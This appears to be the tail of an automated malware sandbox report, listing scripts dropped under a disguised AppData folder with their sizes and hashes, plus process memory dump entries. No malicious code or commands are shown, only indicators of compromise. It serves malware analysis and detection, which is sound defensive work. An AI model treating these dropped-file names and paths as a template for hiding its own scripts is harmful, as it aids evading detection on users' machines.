C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat

Filesize
923B

MD5
d363e3b328794fe3bb4c7161b912da38

SHA1
ea54f834acb70088ca03599591f20c41815b4a60

SHA256
58ed7e647f6d356847c9e9a39fcfa9d5bd6dd7409a402b2162926f635f93983c

SHA512
6e5f5404e78fd968c9d7f9e2dff3dbff0252dae17af70c1bc0e4589e892dca49fb9cdf3f932b1922137411bc754cc048edd71fe014dc4d93731c695bddffe61a

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol03.bat

Filesize
1KB

MD5
fd7c0388ca12d5d72cbdc97994d59d40

SHA1
655221c41dfdc27631d4b738138bb32680022aea

SHA256
8e7846031b9c738440e55b6ab1d481c17610a330d82d5467761c7e8fbf6ba38a

SHA512
d6a77f0387aeae78ff929c16f0aeea82df93e81eaafcb20e05d3c080602d1fd670a5b84da9cafb031b7a546682171c54931c388734627185019c2eed5fff20e9

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\nimiki09.vbs

Filesize
548B

MD5
2246aa37b209d0f04831b3f7d9a61edc

SHA1
00899b4b33f264afef734f622a1cf2bf8564dd02

SHA256
e0e34a17e7ac66b91149f3d744d9d765f8bc30bafe7a11c9e1cb13f881768c6d

SHA512
d97935c3afe6c85cc3212ae8b8bf47dfeb108c1c79690b453efbcfde1212e7d10a379331c4d7f67be773f8d36f954ac8516ba629f86a7345ba017f63daff90cd

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\sun.afr

Filesize
122B

MD5
1fea6d4df76fb51523a03436c2a047fd

SHA1
6253e8fafc9cd795f72bc3aa9b988774bfb7c5d1

SHA256
497f1dbd7a649f47bbd645b89be11de834a499766d239623000530d751cc83e7

SHA512
5d05608daa4c6d9ac4b25fdc7df15831efbc571b594c12eada8d4b5c9a9ffe34426fc2ba0af4f7bf47253f3829077270cfb7f85cffbfb1eae12ad2bc27bba4d1

Download Submit
memory/1064-78-0x0000000000400000-0x0000000000710000-memory.dmp

Filesize
3.1MB

Download
memory/1064-47-0x0000000000400000-0x0000000000710000-memory.dmp

Filesize
3.1MB

Download
memory/1760-107-0x0000000000400000-0x00000000006F9000-memory.dmp

Filesize
3.0MB

Download
memory/1760-82-0x0000000000400000-0x00000000006F9000-memory.dmp

Filesize
3.0MB

Download
memory/3460-122-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/3776-119-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/3940-40-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/3940-43-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/4368-65-0x0000000000400000-0x0000000000710000-memory.dmp

Filesize
3.1MB

Download
memory/4368-76-0x0000000002B60000-0x0000000002D6C000-memory.dmp

Filesize
2.0MB

Download
memory/4368-73-0x0000000002B60000-0x0000000002D6C000-memory.dmp

Filesize
2.0MB

Download
memory/4368-68-0x0000000002B60000-0x0000000002D6C000-memory.dmp

Filesize
2.0MB

Download
memory/4368-66-0x0000000000400000-0x0000000000710000-memory.dmp

Filesize
3.1MB

Download
memory/4368-67-0x0000000000400000-0x0000000000710000-memory.dmp

Filesize
3.1MB

Download
memory/4368-63-0x0000000000400000-0x0000000000710000-memory.dmp

Filesize
3.1MB

Download
memory/4368-62-0x0000000000400000-0x0000000000710000-memory.dmp

Filesize
3.1MB

Download
memory/4368-57-0x0000000002B60000-0x0000000002D6C000-memory.dmp

Filesize
2.0MB

Download
memory/4368-53-0x0000000002B60000-0x0000000002D6C000-memory.dmp

Filesize
2.0MB

Download
memory/4368-51-0x0000000000400000-0x0000000000710000-memory.dmp

Filesize
3.1MB

Download
memory/4588-86-0x0000000000400000-0x00000000006F9000-memory.dmp

Filesize
3.0MB

Download
memory/4588-101-0x0000000000400000-0x00000000006F9000-memory.dmp

Filesize
3.0MB

Download
memory/4588-102-0x0000000002AE0000-0x0000000002CEC000-memory.dmp

Filesize
2.0MB

Download
memory/4588-106-0x0000000002AE0000-0x0000000002CEC000-memory.dmp

Filesize
2.0MB

Download
memory/4588-100-0x0000000000400000-0x00000000006F9000-memory.dmp

Filesize
3.0MB

Download
memory/4588-99-0x0000000000400000-0x00000000006F9000-memory.dmp

Filesize
3.0MB

Download
memory/4588-98-0x0000000000400000-0x00000000006F9000-memory.dmp

Filesize
3.0MB

Download
memory/4588-88-0x0000000002AE0000-0x0000000002CEC000-memory.dmp

Filesize
2.0MB

Download
memory/4588-92-0x0000000002AE0000-0x0000000002CEC000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads